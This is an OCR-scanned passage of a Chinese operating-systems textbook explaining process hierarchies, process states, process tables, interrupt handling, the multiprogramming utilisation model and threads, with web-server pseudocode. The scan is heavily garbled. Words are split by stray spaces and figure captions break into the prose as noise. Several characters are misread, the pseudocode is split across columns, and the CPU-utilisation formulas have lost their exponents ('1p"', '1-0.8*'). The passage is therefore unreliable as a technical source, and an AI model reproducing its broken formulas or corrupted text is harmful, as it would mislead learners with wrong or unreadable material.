在 UNIX 中 ， 进 程 和 它 的 所 有 子 进 程 以 及 后 裔 共同 组 成 一 个 进程 组 。 当 用 户 从 键盘 发 出 一 个 信号 时 ， 
该 信号 被 送 给 当前 与 键盘 相关 的 进程 组 中 的 所 有 成 员 (它们 通常 是 在 当前 窗口 创建 的 所 有 活动 进程 ) 。 
每 个 进程 可 以 分 别 捕获 该 信号 、 忽 略 该 信号 或 采取 默认 的 动作 ， 即 被 该 信号 杀 死 。 

这 里 有 另 一 个 例子 ， 可 以 用 来 说 明 进 程 层次 的 作用 ， 考 虑 UNIX 在 启动 时 如 何 初始 化 自己 。 一 个 称 
为 init 的 特殊 进程 出 现在 启动 映像 中 。 当 它 开始 运行 时 ， 读 入 一 个 说 明 终 端 数 量 的 文件 。 接 着 ， 为 每 个 
终端 创建 一 个 新 进程 。 这 些 进 程 等 待 用 户 登录 。 如 果 有 一 个 用 户 登 录 成 功 ， 该 登录 进程 就 执行 一 个 shell 
准备 接收 命令 。 所 接收 的 这 些 命令 会 启动 更 多 的 进程 ， 以 此 类 推 。 这 样 ， 在 整个 系统 中 ， 所 有 的 进程 都 
属于 以 init 为 根 的 一 棵 树 。 

相反 ，Windows 中 没有 进程 层次 的 概念 ， 所 有 的 进程 都 是 地 位 相同 的 。 唯 一 类 似 于 进程 层次 的 暗示 
是 在 创建 进程 的 时 候 ， 父 进程 得 到 一 个 特别 的 令 牌 〈 称 为 句柄 ) ， 该 句柄 可 以 用 来 控制 子 进程 。 但 是 ， 
它 有 权 把 这 个 令 牌 传送 给 某 个 其 他 进程 ， 这 样 就 不 存在 进程 层次 了 。 在 UNIX 中 ， 进 程 就 不 能 剥夺 其 子 
继承 的 “继承 权 ”。 

2.1.5 进程 的 状态 

尽管 每 个 进程 是 一 个 独立 的 实体 ， 有 其 自己 的 程序 计数 器 和 内 部 状态 ， 但 是 ， 进 程 之 间 经 常 需要 相 
互 作用 。 一 个 进程 的 输出 结果 可 能 作为 另 一 个 进程 的 输入 。 在 shell 命 令 

cat chapter1 chapter2 chapter3 | grep tree 


中 ， 第 一 个 进程 运行 cat， 将 三 个 文件 连接 并 输出 。 第 二 个 进程 运行 grep， 它 从 输入 中 选择 所 有 包含 单词 
“tree” 的 那些 行 。 根 据 这 两 个 进程 的 相对 速度 (这 取决 于 这 两 个 程序 的 相对 复杂 度 和 各 自 所 分 配 到 的 
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CPU 时 间 )， 可 能 发 生 这 种 情况 : grep 准 备 就 绪 可 以 运行 ， 但 输入 还 没有 完成 。 于 是 必须 阻塞 grep， 直 到 
输入 到 来 。 

当 一 个 进程 在 逻辑 上 不 能 继续 运行 时 ， 它 就 会 被 阻塞 ， 典 型 的 例子 是 它 在 等 待 可 以 使 用 的 输入 。 还 
可 能 有 这 样 的 情况 : 一 个 概念 上 能 够 运行 的 进程 被 迫 停 止 ， 因 为 操作 系统 调度 另 一 个 进程 占用 了 CPU。 
这 两 种 情况 是 完全 不 同 的。 在 第 一 种 情况 下 ， 进 程 挂 起 是 程序 自身 固有 的 原因 (在 键入 用 户 命令 行 之 前 ， 
无 法 执行 命令 )。 第 二 种 情况 则 是 由 系统 技术 上 的 原因 引起 的 (由 于 没有 足够 的 CPU， 所 以 不 能 使 每 个 
进程 都 有 一 台 私 用 的 处 理 器 )。 在 图 2-2 中 可 以 看 到 显示 进程 的 三 种 状态 的 状态 图 ， 这 三 种 状态 是 : 

1) 运行 态 ( 该 时 刻 进程 实际 占用 CPU ) 。 

2) 就 绪 态 (可 运行 ， 但 因为 其 他 进程 
正在 运行 而 暂时 停止 )。 Caf) 1. 进 程 因为 等 待 输入 而 被 阻塞 

2. 调度 程序 选择 另 一 个 进程 


3) 阻塞 态 外 部 事件 发 生 ， 
woe T Y Ne ENANA 
前 两 种 状态 在 逻辑 上 是 类 似 的 。 处 于 (mæ SA 
这 两 种 状态 的 进程 都 可 以 运行 ， 只 是 对 于 
第 二 种 状态 暂时 没有 CPU 分 配给 它 。 第 三 
种 状态 与 前 两 种 状态 不 同 ， 处 于 该 状态 的 ”图 2-2 一 个 进程 可 处 于 运行 态 、 阻 塞 坊 和 就 绪 态 ， 图 中 显 
进程 不 能 运行 ， 即 使 CPU 空闲 也 不 行 。 示 出 各 状态 之 间 的 转换 

进程 的 三 种 状态 之 间 有 四 种 可 能 的 转 
换 关系 ， 如 图 2-2 所 示 。 在 操作 系统 发 现 进程 不 能 继续 运行 下 去 时 ， 发 生 转换 1。 在 某 些 系统 中 ， 进 程 可 
以 执行 一 个 诸如 pause 的 系统 调用 来 进入 阻塞 状态 。 在 其 他 系统 中 ， 包 括 UNIX， 当 一 个 进程 从 管道 或 
设备 文件 (例如 终端 ) 读 取 数 据 时 ， 如 果 没 有 有 效 的 输入 存在 ， 则 进程 会 被 自动 阻塞 。 

转换 2 和 3 是 由 进程 调度 程序 引起 的 ， 进 程 调度 程序 是 操作 系统 的 一 部 分 ， 进 程 甚至 感觉 不 到 调度 程 
序 的 存在 。 系 统 认为 一 个 运行 进程 占用 处 理 器 的 时 间 已 经 过 长 ， 决 定 让 其 他 进程 便 用 CPU 时 间 时 ， 会 发 
生 转 换 2。 在 系统 已 经 让 所 有 其 他 进程 享有 了 它们 应 有 的 公平 待遇 而 重新 轮 到 第 一 个 进程 再 次 占用 CPU 
运行 时 ， 会 发 生 转换 3。 调 度 程序 的 主要 工作 就 是 决定 应 当 运行 哪个 进程 、 何 时 运行 及 它 应 该 运行 多 长 
时 间 ， 这 是 很 重要 的 一 点 ， 我 们 将 在 本 章 的 后 面部 分 进行 讨论 。 目 前 已 经 提出 了 许多 算法 ， 这 些 算法 力 
图 在 整体 效率 和 进程 的 竞争 公平 性 之 间 取 得 平衡 。 我 们 将 在 本 章 稍 后 部 分 研究 其 中 的 一 些 问题 。 

当 进 程 等 待 的 一 个 外 部 事件 发 生 时 (如 一 些 输入 到 达 ), 则 发 生 转 换 4。 如 果 此 时 没有 其 他 进程 运行 ， 
则 立即 触发 转换 3， 该 进程 便 开始 运行 。 否 oe 


则 该 进程 将 处 于 就 络 态 ， 等 待 CPU 空闲 并 
且 轮 到 它 运行 。 
使 用 进程 模型 使 得 我 们 易于 想象 系统 
内 部 的 操作 状况 。 一 些 进程 正在 运行 执行 用 
户 键入 命令 所 对 应 的 程序 。 另 一 些 进程 是 系 


Me RCIA a aag 图 2.3 基于 进程 的 操作 系统 中 最 底层 的 是 中 断 和 调度 处 理 
在 该 层 之 上 是 顺序 进程 


动 器 和 磁带 机 的 运行 细节 等 。 当 发 生 一 个 磁 
盘 中 断 时 ， 系 统 会 做 出 决定 ， 停 止 运行 当前 进程 ， 转 而 运行 磁盘 进程 ， 该 进程 在 此 之 前 因 等 待 中 断 而 处 
于 阻塞 态 。 这 样 就 可 以 不 再 考虑 中 断 ， 而 只 是 考虑 用 户 进程 、 磁 盘 进 程 、 终 端 进程 等 。 这 些 进程 在 等 待 
时 总 是 处 于 阻塞 状态 。 在 已 经 读 和 人 磁盘 或 键入 字符 后 ， 等 待 它们 的 进程 就 被 解除 阻塞 ， 并 成 为 可 调度 运 
行 的 进程 。 

从 这 个 观点 引出 了 图 2-3 所 示 的 模型 。 在 图 2-3 中 ， 操 作 系统 的 最 底层 是 调度 程序 ， 在 它 上 面 有 许多 
进程 。 所 有 关于 中 断 处 理 、 启 动 进程 和 停止 进程 的 具体 细节 都 隐藏 在 调度 程序 中 。 实 际 上 ， 调 度 程序 是 
一 段 非常 短小 的 程序 。 操 作 系统 的 其 他 部 分 被 简单 地 组 织 成 进程 的 形式 。 不 过 ， 很 少 有 真实 的 系统 是 以 
这 样 的 理想 方式 构造 的 。 
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2.1.6 进程 的 实现 

为 了 实现 进程 模型 ， 操 作 系 统 维护 着 一 张 表格 (一 个 结构 数组 ) ， 即 进程 表 (process table) 。 每 个 进 
程 占用 一 个 进程 表 项 。( 有 些 作 者 称 这 些 表 项 为 进程 控制 块 。) 该 表 项 包含 了 进程 状态 的 重要 信息 ， 包 括 
程序 计数 器 、 堆 栈 指针 、 内 存 分 配 状 况 、 所 打开 文件 的 状态 、 账 号 和 调度 信息 ， 以 及 其 他 在 进程 由 运行 
态 转换 到 就 绪 态 或 阻塞 态 时 必须 保存 的 信息 ， 从 而 保证 该 进程 随后 能 再 次 启动 ， 就 像 从 未 被 中 断 过 一 样 。 

图 2-4 中 展示 了 在 一 个 典型 系统 中 的 关键 字段 。 第 一 列 中 的 字段 与 进程 管理 有 关 。 其 他 两 列 分 别 与 
存储 管理 和 文件 管理 有 关 。 应 该 注意 到 进程 表 中 的 字段 是 与 系统 密切 相关 的 ， 不 过 该 图 给 出 了 所 需要 信 
息 的 大 致 介绍 。 








进程 管理 存储 管理 文件 管理 
寄存 器 正文 段 指 针 根 目录 
程序 计数 器 数据 段 指针 工作 目录 
程序 状态 字 堆栈 段 指 针 文件 描述 符 





进程 开始 时 间 

使 用 的 CPU 时 间 
子 进程 的 CPU 时 间 
下 次 定时 器 时 间 











L 





图 2-4 典型 的 进程 表 表 项 中 的 一 些 字段 


在 了 解 进程 表 后 ， 就 可 以 对 在 单个 (或 每 一 个 ) CPU 上 如 何 维持 多 个 顺 译 进程 的 错觉 做 更 多 的 阐述 。 
与 每 一 1/O 类 关联 的 是 一 个 称 作 中 断 向 量 (interrupt vector) 的 位 置 (靠近 内 存 底部 的 固定 区 域 )。 它 包 
含 中 断 服务 程序 的 入 口 地 址 。 假 设 当 一 个 磁盘 中 断 发 生 时 ， 用 户 进程 3 正在 运行 ， 则 中 断 硬件 将 程序 计 
数 器 、 程 序 状 态 字 、 有 时 还 有 一 个 或 多 个 寄存 器 压 入 堆栈， 计算 机 随即 跳 转 到 中 断 向 量 所 指示 的 地 址 。 
这 些 是 硬件 完成 的 所 有 操作 ， 然 后 软件 ， 特 别 是 中 断 服务 例 程 就 接管 一 切 剩余 的 工作 。 

所 有 的 中 断 都 从 保存 寄存 器 开始 ， 对 于 当前 进程 而 言 ， 通 常 是 保存 在 进程 表 项 中 。 随 后 ， 会 从 堆 楼 
中 删除 由 中 上 断 硬件 机 制 存 入 堆 术 的 那 部 分 信息 ， 并 将 堆栈 指针 指向 一 个 由 进程 处 理 程序 所 使 用 的 临时 堆 
栈 。 一 些 诸如 保存 寄存 器 值 和 设置 堆栈 指针 等 操作 ， 
无 法 用 C 语 言 这 一 类 高 级 语言 描述 ， 所 以 这 些 操作 通 。 | 要件 诬 个 由 拉 征 委 半 新 并 入 秆 计数 器 ， 
过 一 个 短小 的 汇编 语言 例 程 来 完成 ， 通 常 该 例 程 可 以 | 3- 汇编 语言 过 程 保存 寄存 器 值 。 


供 所 有 的 中 断 使 用 ， 因 为 无 论 中 断 是 怎样 引起 的 ， 有 | 4. 汇编 语言 过 程 设 置 新 的 堆栈 。 
za 5.C 中 断 服 务 例 程 运行 (典型 地 读 和 缓冲 输入 ) 。 
关 保 存 寄 存 器 的 工作 则 是 完全 一 样 的 。 6. 调度 程序 决定 下 一 个 将 运行 的 进程 。 
当 该 例 程 结 束 后 ， 它 调用 一 个 C 过 程 处 理 某 个 特 | 7. C 过 程 返回 至 汇编 代码 。 


定 的 中 断 类 型 剩 下 的 工作 。( 假 定 操作 系统 由 C 语 言 Ee aiaia HARE a 
写 ， 通 常 这 是 所 有 真实 操作 系统 的 选择 ) 。 在 完成 有 
关 工作 之 后 ， 大 概 就 会 使 革 些 进程 就 结 ， 接 着 调用 调 C TOR ERREAARRENTIER 
度 程序 ， 决 定 随后 该 运行 哪个 进程 。 随 后 将 控制 转 给 一 段 汇编 语言 代码 ， 为 当前 的 进程 装 和 寄存 器 值 以 
及 内 存 映射 并 启动 该 进程 运行 。 图 2-5 中 总 结 了 中 断 处 理 和 调度 的 过 程 。 值 得 注意 的 是 ， 各 种 系统 之 间 
某 些 细节 会 有 所 不 同 。 

一 个 进程 在 执行 过 程 中 可 能 被 中 断 数 千 次 ， 但 关键 是 每 次 中 断后 ， 被 中 断 的 进程 都 返回 到 与 中 上 断 发 
生前 完全 相同 的 状态 。 
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2.1.7 多 道 程序 设计 模型 
采用 多 道 程序 设计 可 以 提高 CPU 的 利用 率 。 严 格 地 说 ， 如 果 进 程 用 于 计算 的 平均 时 间 是 进程 在 内 存 
中 停留 时 间 的 20% ， 且 内 存 中 同时 有 5 个 进程 ， 则 CPU 将 一 直 满 负载 运行 。 然 而 ， 这 个 模型 在 现实 中 过 
于 乐观 ， 因 为 它 假设 这 5 个 进程 不 会 同时 等 待 IO 。 
更 好 的 模型 是 从 概率 的 角度 来 看 CPU 的 
利用 率 。 假 设 一 个 进程 等 待 O 操 作 的 时 间 与 
其 停留 在 内 存 中 时 间 的 比 为 p。 当 内 存 中 同时 







20% IO 等 待 


50% IO 等 待 





有 个 进程 时 ， 则 所 有 mn 个 进程 都 在 等 待 HO == © 
(此 时 CPU 空转 ) 的 概率 是 p"。CPU 的 利用 率 £ 60 80% I/O 等 待 
由 下 面 的 公式 给 出 : © 40 
CPU 利用 率 = 1p" W 
图 2-6 以 "为 变量 的 函数 表示 了 CPU 的 利 
用 率 ，m 称 为 多 道 程序 设计 的 道 数 (degree of 一 
multiprogramming ) 。 多 道 程序 设计 的 道 数 


从 图 2-6 中 可 以 清楚 地 看 到 ， 如 果 进 程 花 ‘ 

费 80% 的 时 间 等 待 O， 为 使 CPU 的 浪费 低 于 图 2-6 CPU 利用 率 是 内 存 中 进程 数目 的 函数 
10% ， 至 少 要 有 10 个 进程 同时 在 内 存 中 。 当 读者 认识 到 一 个 等 待 用 户 从 终端 输入 的 交互 式 进程 是 处 于 IO 
等 待 状态 时 ， 那 么 很 明显 ，80% 甚 至 更 多 的 IO 等 待 时 间 是 普遍 的 。 即 使 是 在 服务 器 中 ， 做 大 量 磁 盘 IO 
操作 的 进程 也 会 花费 同样 或 更 多 的 等 待 时 间 。 

从 完全 精确 的 角度 考虑 ， 应 该 指出 此 概率 模型 只 是 描述 了 一 个 大 致 的 状况 。 它 假设 所 有 n 个 进程 是 
独立 的 ， 即 内 存 中 的 5 个 进程 中 ，3 个 运行 ，2 个 等 待 ， 是 完全 可 接受 的 。 但 在 单 CPU 中 ， 不 能 同时 运行 3 
个 进程 ， 所 以 当 CPU 忙 时 ， 已 就 绪 的 进程 也 必须 等 待 CYPU。 因 而 ， 进 程 不 是 独立 的 。 更 精确 的 模型 应 该 
用 排队 论 构建 ， 但 我 们 的 模型 ( 当 进 程 就 绪 时 ， 给 进程 分 配 CPU， 否 则 让 CPU 空 转 ) 仍然 是 有 效 的 ， 即 
使 真实 曲线 会 与 图 2-6 中 所 画 的 略 有 不 同 。 

虽然 图 2-6 的 模型 很 简单 、 很 粗略 ， 它 依然 对 预测 CPU 的 性 能 很 有 效 。 例 如 ， 假 设计 算 机 有 8GB 内 
存 ， 操 作 系统 及 相关 表格 占用 2GB， 每 个 用 户 程序 也 占用 2GB。 这 些 内 存 空 间 允 许 3 个 用 户 程序 同时 驻 
留 在 内 存 中 。 若 80% 的 时 间 用 于 IO 等 待 ， 则 CPU 的 利用 率 (忽略 操作 系统 开销 ) 大 约 是 1-0.8*， 即 大 约 
49%。 在 增加 8GB 字 节 的 内 存 后 ， 可 从 3 道 程序 设计 提高 到 7 道 程序 设计 ， 因 而 CPU 利 用 率 提高 到 79%。 
换言之 ， 第 二 个 8GB 内 存 提 高 了 30% 的 吞吐 量 。 

增加 第 三 个 8GB 内 存 只 能 将 CPU 利 用 率 从 79% 提 高 到 91%， 吞 吐 量 的 提高 仅 为 12%。 通 过 这 一 模型 ， 
计算 机 用 户 可 以 确定 ， 第 一 次 增加 内 存 是 一 个 划算 的 投资 ， 而 第 二 个 则 不 是 。 


2.2 线程 


在 传统 操作 系统 中 ， 每 个 进程 有 一 个 地 址 空间 和 一 个 控制 线程 。 事实 上 ， 这 几乎 就 是 进程 的 定义 。 
不 过 ， 经 常 存在 在 同一 个 地 址 空间 中 准 并 行 运 行 多 个 控制 线程 的 情形 ， 这 些 线程 就 像 (差不多 ) 分 离 的 
进程 (共享 地 址 空间 除外 )。 在 下 面 各 节 中 ， 我 们 将 讨论 这 些 情形 及 其 实现 。 


2.2.1 线程 的 使 用 

为 什么 人 们 需要 在 一 个 进程 中 再 有 一 类 进程 ”有 若干 理由 说 明 产 生 这 些 迷 你 进程 ( 称 为 线程 ) 的 必 
要 性 。 下 面 我 们 来 讨论 其 中 一 些 理由 。 人 们 需要 多 线程 的 主要 原因 是 ， 在 许多 应 用 中 同时 发 生 着 多 种 活 
动 。 其 中 某 些 活动 随 着 时 间 的 推移 会 被 阻塞 。 通 过 将 这 些 应 用 程序 分 解 成 可 以 准 并 行 运行 的 多 个 顺序 线 
程 ， 程 序 设 计 模型 会 变 得 更 简单 。 

前 面 已 经 进行 了 有 关 讨 论 。 准 确 地 说 ， 这 正 是 之 前 关于 进程 模型 的 讨论 。 有 了 这 样 的 抽象 ， 我 们 才 
不 必 考 虑 中 断 、 定 时 器 和 上 下 文 切换 ， 而 只 需 考 察 并 行进 程 。 类 似 地 ， 只 是 在 有 了 多 线程 概念 之 后 ， 我 
们 才 加 入 了 一 种 新 的 元 素 : 并 行 实 体 拥 有 共享 同一 个 地 址 空间 和 所 有 可 用 数据 的 能 力 。 对 于 某 些 应 用 而 
言 ， 这 种 能 力 是 必需 的 ， 而 这 正 是 多 进程 模型 (它们 具有 不 同 的 地 址 空间 ) 所 无 法 表达 的 。 
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第 二 个 关于 需要 多 线程 的 理由 是 ， 由 于 线程 比 进程 更 轻 量 级 ， 所 以 它们 比 进 程 更 容易 〈 即 更 快 ) 创 
建 ， 也 更 容易 撤销 。 在 许多 系统 中 ， 创 建 一 个 线程 较 创 建 一 个 进程 要 快 10~100 倍 。 在 有 大 量 线程 需要 动 
态 和 快速 修改 时 ， 具 有 这 一 特性 是 很 有 用 的 。 

需要 多 线程 的 第 三 个 原因 涉及 性 能 方面 的 讨论 。 若 多 个 线程 都 是 CPU 密集 型 的 ， 那 么 并 不 能 获得 性 
能 上 的 增强 ,但 是 如 果 存 在 着 大 量 的 计算 和 大 量 的 1/O 处 理 ， 拥 有 多 个 线程 允许 这 些 活动 彼此 重合 进行 ， 
从 而 会 加 快 应 用 程序 执行 的 速度 。 

最 后 ， 在 多 CPU 系 统 中 ， 多 线程 是 有 益 的 ， 在 这 样 的 系统 中 ， 真 正 的 并 行 有 了 实现 的 可 能 ， 第 8 章 
将 讨论 这 个 主题 。 

通过 考察 一 些 典 型 例子 ,我们 可 以 更 清楚 地 看 出 引入 多 线程 的 好 处 。 作 为 第 一 个 例子 ， 考 虑 一 个 字 
处 理 软 件 。 字 处 理 软件 通常 按照 出 现在 打印 页 上 的 格式 在 屏幕 上 精确 显示 文档 。 特 别 地 ， 所 有 的 行 分 隔 
符 和 页 分 隔 符 都 在 正确 的 最 终 位 置 上 ， 这 样 在 需要 时 用 户 可 以 检查 和 修改 文档 (比如 ， 消 除 孤 行 一 一 在 
一 页 上 不 完整 的 顶部 行 和 底部 行 ， 因 为 这 些 行 不 甚 美观 ) 。 

假设 用 户 正在 写 一 本 书 。 从 作者 的 观点 来 看 ， 最 容易 的 方法 是 把 整 本 书 作 为 一 个 文件 ， 这 样 一 来 ， 
查询 内 容 、 完 成 全 局 替换 等 都 非常 容易 。 另 一 种 方法 是 ， 把 每 一 章 都 处 理 成 单独 一 个 文件 。 但 是 ， 在 把 每 
个 小 节 和 子 小 节 都 分 成 单个 的 文件 之 后 ， 若 必须 对 全 书 进行 全 局 的 修改 时 ， 那 就 真是 麻烦 了 ， 因 为 有 成 百 
个 文件 必须 一 个 个 地 编辑 。 例 如 ， 如 果 所 建议 的 某 个 标准 x x x x 正好 在 书 付 印 之 前 被 批准 了 ， 于 是 “ 标 
准 草案 x x x x ”一 类 的 字眼 就 必须 改 为 “标准 x x x x”。 如 果 整 本 书 是 一 个 文件 ， 那 么 只 要 一 个 命令 
就 可 以 完成 全 部 的 替换 处 理 。 相 反 ， 如 果 一 本 书 分 成 了 300 个 文件 ， 那 么 就 必须 分 别 对 每 个 文件 进行 编辑 。 

现在 考虑 ， 如 果 有 一 个 用 户 突然 在 一 个 有 800 页 的 文件 的 第 一 页 上 删 掉 了 一 个 语句 之 后 ， 会 发 生 什 
么 情形 。 在 检查 了 所 修改 的 页 面 并 确认 正确 后 ， 这 个 用 户 现 在 打算 接着 在 第 600 页 上 进行 另 一 个 修改 ， 
并 键入 一 条 命令 通知 字 处 理 软 件 转 到 该 页 面 ( 可 能 要 查阅 只 在 那里 出 现 的 一 个 短语 )。 于 是 字 处 理 软 件 
被 强制 对 整 本 书 的 前 600 页 重新 进行 格式 处 理 ， 这 是 因为 在 排列 该 页 前 面 的 所 有 页 面 之 前 ， 字 处 理 软 件 
并 不 知道 第 600 页 的 第 一 行 应 该 在 哪里 。 而 在 第 600 页 的 页 面 可 以 真正 在 屏幕 上 显示 出 来 之 前 ， 计 算 机 可 
能 要 拖延 相当 一 段 时 间 ， 从 而 令 用 户 不 甚 满意 。 

多 线程 在 这 里 可 以 发 挥 作用 。 假设 字 处 理 软 件 被 编写 成 含有 两 个 线程 的 程序 。 一 个 线程 与 用 户 交 互 ， 
而 另 一 个 在 后 台 重 新 进行 格式 处 理 。 一 旦 在 第 1 页 中 的 语句 被 删除 掉 ， 交 互 线程 就 立即 通知 格式 化 线程 
对 整 本 书 重新 进行 处 理 。 同 时 ， 交 互 线 程 继续 监控 键盘 和 鼠标 ， 并 响应 诸如 滚动 第 1 页 之 类 的 简单 命令 ， 
此 刻 ， 另 一 个 线程 正在 后 台 疯 狂 地 运算 。 如 果 有 点 运气 的 话 ， 重 新 格式 化 会 在 用 户 请 求 查看 第 600 页 之 
前 完成 ， 这 样 ， 第 600 页 页 面 就 立即 可 以 在 屏幕 上 显示 出 来 。 

如 果 已 经 做 到 了 这 一 步 ， 那 么 为 什么 不 再 进一步 增加 一 个 线程 呢 ? 许多 字 处 理 软件 都 有 每 隔 若干 分 
钟 自动 在 磁盘 上 保存 整个 文件 的 特点 ， 用 于 避免 由 于 程序 崩溃 、 系 统 崩溃 或 电源 故障 而 造成 用 户 一 整 天 
的 工作 丢失 的 情况 。 第 三 个 线程 可 以 处 理 磁盘 备份 ， 而 不 必 干 扰 其 他 两 个 线程 。 拥 有 三 个 线程 的 情形 ， 
如 图 2-7 所 示 。 





图 2-7 有 三 个 线程 的 字 处 理 软件 
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如 果 程 序 是 单线 程 的 ， 那 么 在 进行 磁盘 备份 时 ， 来 自 键盘 和 鼠标 的 命令 就 会 被 忽略 ， 直 到 备份 工作 
完成 为 止 。 用 户 当然 会 认为 性 能 很 差 。 另 一 个 方法 是 ， 为 了 获得 好 的 性 能 ， 可 以 让 键盘 和 上 鼠标 事件 中 断 
磁盘 备份 ， 但 这 样 却 引入 了 复杂 的 中 上 断 驱 动 程序 设计 模型 。 如 果 使 用 三 个 线程 ， 程 序 设计 模型 就 很 简单 
了 。 第 一 个 线程 只 是 和 用 户 交互 ， 第 二 个 线程 在 得 到 通知 时 进行 文档 的 重新 格式 化 ， 第 三 个 线程 周期 性 
地 将 RAM 中 的 内 容 写 到 磁盘 上 。 

很 显然, 在 这 里 用 三 个 不 同 的 进程 是 不 能 工作 的 , 这 是 因为 三 个 线程 都 需要 对 同一 个 文件 进行 操作 。 
由 于 多 个 线程 可 以 共享 公共 内 存 ， 所 以 通过 用 三 个 线程 替换 三 个 进程 ， 使 得 它们 可 以 访问 同一 个 正在 编 
辑 的 文件 ， 而 三 个 进程 是 做 不 到 的 。 

许多 其 他 的 交互 式 程序 中 也 存在 类 似 的 情形 。 例 如 ， 电 子 表格 是 允许 用 户 维护 矩阵 的 一 种 程序 ， 邱 
阵 中 的 一 些 元 素 是 用 户 提供 的 数据 ， 另 一 些 元 素 是 通过 所 输入 的 数据 运用 可 能 比较 复杂 的 公式 而 得 出 的 
计算 结果 。 当 用 户 改变 一 个 元 素 时 ， 许 多 其 他 元 素 就 必须 重新 计算 。 通 过 一 个 后 台 线程 进行 重新 计算 的 
方式 ， 交 互 式 线程 就 能 够 在 进行 计算 的 时 候 ， 让 用 户 从 事 更 多 的 工作 。 类 似 地 ， 第 三 个 线程 可 以 在 磁盘 
上 进行 周期 性 的 备份 工作 。 

现在 考虑 另 一 个 多 线程 发 挥 作用 的 例子 : Web 服 务 器 进程 
一 个 万 维 网 服务 器 。 对 页 面 的 请 求 发 给 服务 器 ， 
而 所 请 求 的 页 面 发 回 给 客户 机 。 在 多 数 Web 站 点 
上 ， 某 些 页 面 较 其 他 页 面相 比 ， 有 更 多 的 访问 。 
例如 ， 对 Sony 主 页 的 访问 就 远 远 超过 对 深 藏 在 页 
面 树 里 的 任何 特定 摄像 机 的 技术 说 明 书页 面 的 访 
问 。 利 用 这 一 事实 ，Web 服 务 器 可 以 把 获得 大 量 
访问 的 页 面 集合 保存 在 内 存 中 ， 避 免 到 磁盘 去 调 
入 这 些 页 面 ， 从 而 改善 性 能 。 这 样 的 一 种 页 面 集 
合 称 为 高 速 缓存 (cache) ， 高 速 缓存 也 运用 在 其 
他 许多 场合 中 。 例 如 在 第 1 章 中 介绍 的 CPU 缓存 。 

一 种 组 织 Web 服 务 器 的 方式 如 图 2-8 所 示 。 图 2-8 一 个 多 线程 的 Web 服 务 器 
在 这 里 ， 一 个 称 为 分 派 程序 (dispatcher) 的 线程 从 网 络 中 读 和 工作 请 求 。 在 检查 请 求 之 后 ， 分 派 线程 挑 
选 一 个 空转 的 〈 即 被 阻塞 的 ) 工作 线程 (worker thread) ， 提 交 该 请 求 ， 通 常 是 在 每 个 线程 所 配 有 的 某 个 
专门 字 中 写 入 一 个 消息 指针 。 接 着 分 派 线程 唤醒 睡眠 的 工作 线程 ， 将 它 从 阻塞 状态 转 为 就 绪 状 态 。 

在 工作 线程 被 唤醒 之 后 ， 它 检查 有 关 的 请 求 是 否 在 Web 页 面 高 速 缓存 之 中 ， 这 个 高 速 缓存 是 所 有 线 
程 都 可 以 访问 的 。 如 果 没有 ， 读 线程 开始 一 个 从 磁盘 调 入 页 面 的 read 操 作 ， 并 且 阻 塞 直 到 该 磁盘 操作 完 
成 。 当 上 述 线程 阻塞 在 磁盘 操作 上 时 ， 为 了 完成 更 多 的 工作 ， 分 派 线程 可 能 挑选 另 一 个 线程 运行 ， 也 可 
能 把 另 一 个 当前 就 绪 的 工作 线程 投入 运行 。 

这 种 模型 允许 把 服务 器 编写 为 顺序 线程 的 一 个 集合 。 在 分 派 线程 的 程序 中 包含 一 个 无 限 循环 ， 访 循 
环 用 来 获得 工作 请 求 并 且 把 工作 请 求 派 给 工作 线程 。 每 个 工作 线程 的 代码 包含 一 个 从 分 派 线程 接收 的 请 
求 ， 并 且 检查 Web 高 速 缓存 中 是 否 存在 所 需 页 面 的 无 限 循环 。 如 果 存 在 ， 就 将 该 页 面 返回 给 客户 机 ， 接 
着 该 工作 线程 阻塞 等待 一 个 新 的 请 求 。 如 果 没有 ， 工 作 线程 就 从 磁盘 调 入 该 页 面 ， 将 该 页 面 返回 给 客 
户 机 ， 然 后 该 工作 线程 阻塞 ， 等 待 一 个 新 的 请 求 。 

图 2-9 给 出 了 有 关 代码 的 大 致 框架 。 如 同 本 书 的 其 他 部 分 一 样 ， 这 里 假设 TRUE 为 常数 1。 另 外 ，buf 
和 page 分 别 是 保存 工作 请 求 和 Web 页 面 的 相应 结构 。 





while (TRUE) { while (TRUE) { 
get_next_request(&buf); wait_for_work(&buf) 


handoff_work(&buf); look_for_page_in_cache(&buf, &page); 
} if (page_not_in_cache(&page)) 


read_page_from_disk(&buf, &page); 
return_page(&page); 





a) b) 
图 2-9 对 应 图 2-8 的 代码 概要 : a) 分 派 线程 ，b) 工作 线程 
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现在 考虑 在 没有 多 线程 的 情形 下 ， 如 何 编写 Web 服务 器 。 一 种 可 能 的 方式 是 ， 使 其 像 一 个 线程 一 样 
运行 。Web 服 务 器 的 主 循环 获得 请 求 ， 检 查 请 求 ， 并 且 在 取 下 一 个 请 求 之 前 完成 整个 工作 。 在 等 待 磁盘 
操作 时 ， 服 务 器 就 空转 ， 并 且 不 处 理 任何 到 来 的 其 他 请 求 。 如 果 该 Web 服务 器 运行 在 唯一 的 机 器 上 ， 通 
常情 形 都 是 这 样 ， 那 么 在 等 待 磁盘 操作 时 CPU 只 能 空转 。 结 果 导 致 每 秒 钟 只 有 很 少 的 请 求 被 处 理 。 可 见 
线程 较 好 地 改善 了 Web 服务 器 的 性 能 ， 而 且 每 个 线程 是 按 通 常 方式 顺序 编程 的 。 

到 现在 为 止 ， 我 们 有 了 两 个 可 能 的 设计 方案 多 线程 Web 服 务 器 和 单线 程 Web 服 务 器 。 假 设 设 有 多 
线程 可 用 ， 而 系统 设计 者 又 认为 由 于 单线 程 所 造成 的 性 能 降低 是 不 能 接受 的 ， 那 么 如 果 可 以 使 用 read 系 
统 调 用 的 非 阻塞 版 本 ， 还 存在 第 三 种 可 能 的 设计 。 在 请 求 到 来 时 ， 这 个 唯一 的 线程 对 请 求 进行 考察 。 如 
果 该 请 求 能 够 在 高 速 缓存 中 得 到 满足 ， 那 么 一 切 都 好 ， 如 果 不 能 ， 则 启动 一 个 非 阻 塞 的 磁盘 操作 。 

服务 器 在 表格 中 记录 当前 请 求 的 状态 ， 然 后 去 处 理 下 一 个 事件 。 下 一 个 事件 可 能 是 一 个 新 工作 的 请 
求 ， 或 是 磁盘 对 先前 操作 的 回答 。 如 果 是 新 工作 的 请 求 ， 就 开始 该 工作 。 如 果 是 磁盘 的 回答 ， 就 从 表格 
中 取出 对 应 的 信息 ， 并 处 理 该 回答 。 对 于 非 阻 塞 磁盘 IO 而 言 ， 这 种 回答 多 数 会 以 信号 或 中 断 的 形式 出 现 。 

